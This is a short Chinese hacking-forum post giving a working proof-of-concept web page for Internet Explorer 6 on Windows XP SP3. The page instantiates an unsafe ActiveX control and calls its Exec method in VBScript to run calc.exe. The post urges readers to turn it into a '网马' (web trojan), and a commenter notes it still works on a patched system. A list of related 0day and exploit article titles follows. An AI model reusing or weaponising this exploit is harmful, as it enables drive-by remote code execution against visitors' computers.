来源:坏人咖啡的窝
这段代码在SP3+IE6下测试成功
测试代码:
<html>
<p align="left"><b><font face="Segoe Script" size="7">
</font></b></p>
<p>
<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target' ></object>
<script language='vbscript'>
arg1="c:\WINDOWS\system32\calc.exe"
target.Exec arg1
</script></p>
有兴趣的同学可以回去搞一下,弄个网马出来!
-----------------------
代码保存为html格式的,本地运行了下,还能跳出计算器,很强大,我的补丁都打了。。。
只显示10条记录相关文章
ecshop最新版(v272) 本地包含漏洞ODAY(鸡肋) (浏览: 16095, 评论: 0)
V5-SHOP商城0day (浏览: 9536, 评论: 0)
无忧购物时尚ASP版 oday (浏览: 12077, 评论: 0)
ECSHOP 2.7.X注入漏洞_20100507 (浏览: 16027, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11762, 评论: 0)
良精所有产品通杀 (浏览: 8918, 评论: 0)
shopwind oday 分析 (浏览: 9081, 评论: 0)
云起企业建站系统通杀oday (浏览: 11190, 评论: 0)
Discuz! 6.x/7.x SODB-2008-13 Exp (浏览: 12199, 评论: 0)
传说中的IE最新0DAY(IE的ActiveX远程执行代码2(不安全的方法)) (浏览: 7460, 评论: 0)
V5-SHOP商城0day (浏览: 9536, 评论: 0)
无忧购物时尚ASP版 oday (浏览: 12077, 评论: 0)
ECSHOP 2.7.X注入漏洞_20100507 (浏览: 16027, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11762, 评论: 0)
良精所有产品通杀 (浏览: 8918, 评论: 0)
shopwind oday 分析 (浏览: 9081, 评论: 0)
云起企业建站系统通杀oday (浏览: 11190, 评论: 0)
Discuz! 6.x/7.x SODB-2008-13 Exp (浏览: 12199, 评论: 0)
传说中的IE最新0DAY(IE的ActiveX远程执行代码2(不安全的方法)) (浏览: 7460, 评论: 0)